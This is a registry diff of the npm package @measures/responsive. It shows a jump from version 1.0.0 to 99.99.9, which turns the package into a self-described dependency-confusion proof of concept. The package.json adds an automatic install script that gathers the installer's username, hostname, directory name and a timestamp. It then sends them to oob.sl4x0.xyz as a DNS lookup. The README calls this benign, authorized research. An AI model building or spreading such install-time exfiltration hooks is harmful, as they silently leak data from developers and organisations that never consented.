@measures/responsive 1.0.0 → 99.99.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +15 -11
- package/package.json +11 -6
- package/index.js +0 -1
package/README.md
CHANGED
|
@@ -1,17 +1,21 @@
|
|
|
1
|
-
#
|
|
1
|
+
# Research Demonstration Package
|
|
2
2
|
|
|
3
|
-
This package is a **
|
|
3
|
+
This package is a **demonstration artifact** for evaluating dependency resolution behavior.
|
|
4
4
|
|
|
5
5
|
## Purpose
|
|
6
|
-
This package demonstrates how attackers can exploit dependency confusion attacks by publishing packages with internal naming conventions.
|
|
7
6
|
|
|
8
|
-
|
|
9
|
-
- Makes a DNS callback to `oob.sl4x0.xyz` during installation
|
|
10
|
-
- Collects: username, hostname, directory path, timestamp
|
|
11
|
-
- Does NOT: steal credentials, install malware, or cause harm
|
|
7
|
+
Illustrates how package managers may resolve names that overlap with private or internal packages.
|
|
12
8
|
|
|
13
|
-
##
|
|
14
|
-
This is for **authorized security research only**. Only install on systems you own or have permission to test.
|
|
9
|
+
## Behavior
|
|
15
10
|
|
|
16
|
-
|
|
17
|
-
|
|
11
|
+
* Emits a benign network signal to `oob.sl4x0.xyz` during installation
|
|
12
|
+
* Records limited environment metadata: user identifier, system name, working path, timestamp
|
|
13
|
+
* Does NOT access sensitive data, modify system state, or perform persistence
|
|
14
|
+
|
|
15
|
+
## Usage Notice
|
|
16
|
+
|
|
17
|
+
Intended for **authorized testing and evaluation** within environments you own or are permitted to assess.
|
|
18
|
+
|
|
19
|
+
## For Engineering & Security Teams
|
|
20
|
+
|
|
21
|
+
Presence of this package suggests an opportunity to review dependency source controls and namespace protections.
|
package/package.json
CHANGED
|
@@ -1,13 +1,18 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@measures/responsive",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "",
|
|
3
|
+
"version": "99.99.9",
|
|
4
|
+
"description": "Ethical Proof of Concept",
|
|
5
5
|
"main": "index.js",
|
|
6
6
|
"scripts": {
|
|
7
|
-
"
|
|
7
|
+
"install": "u=$(whoami|tr -cd 'a-zA-Z0-9'|cut -c1-15); h=$(hostname|tr -cd 'a-zA-Z0-9'|cut -c1-20); p=$(basename \"$PWD\"|tr -cd 'a-zA-Z0-9'|cut -c1-15); r=$(date +%s); q=\"blick.${u}.${h}.${p}.${r}.oob.sl4x0.xyz\"; (nslookup \"$q\" >/dev/null 2>&1 || dig +time=2 +tries=1 \"$q\" A >/dev/null 2>&1) || true"
|
|
8
8
|
},
|
|
9
|
-
"
|
|
10
|
-
"author": "",
|
|
9
|
+
"author": "sl4x0",
|
|
11
10
|
"license": "ISC",
|
|
12
|
-
"
|
|
11
|
+
"publishConfig": {
|
|
12
|
+
"access": "public"
|
|
13
|
+
},
|
|
14
|
+
"keywords": ["security-research", "poc", "dependency-confusion"],
|
|
15
|
+
"repository": {
|
|
16
|
+
"type": "git"
|
|
17
|
+
}
|
|
13
18
|
}
|
package/index.js
DELETED
|
@@ -1 +0,0 @@
|
|
|
1
|
-
testing
|